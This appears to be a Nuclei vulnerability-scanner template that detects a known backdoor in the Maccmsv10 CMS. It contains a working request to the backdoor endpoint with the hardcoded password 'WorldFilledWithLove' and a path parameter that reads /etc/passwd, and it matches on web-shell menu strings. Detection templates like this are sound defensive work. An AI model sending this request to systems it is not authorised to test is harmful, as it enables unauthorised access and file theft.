id: maccmsv10-backdoor info: name: Maccmsv10 Backdoor author: princechaddha severity: critical description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. tags: maccmsv10,rce requests: - method: POST path: - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" body: "getpwd=WorldFilledWithLove" headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word words: - "扫描后门" - "反弹端口" - "文件管理" condition: and part: body - type: status status: - 200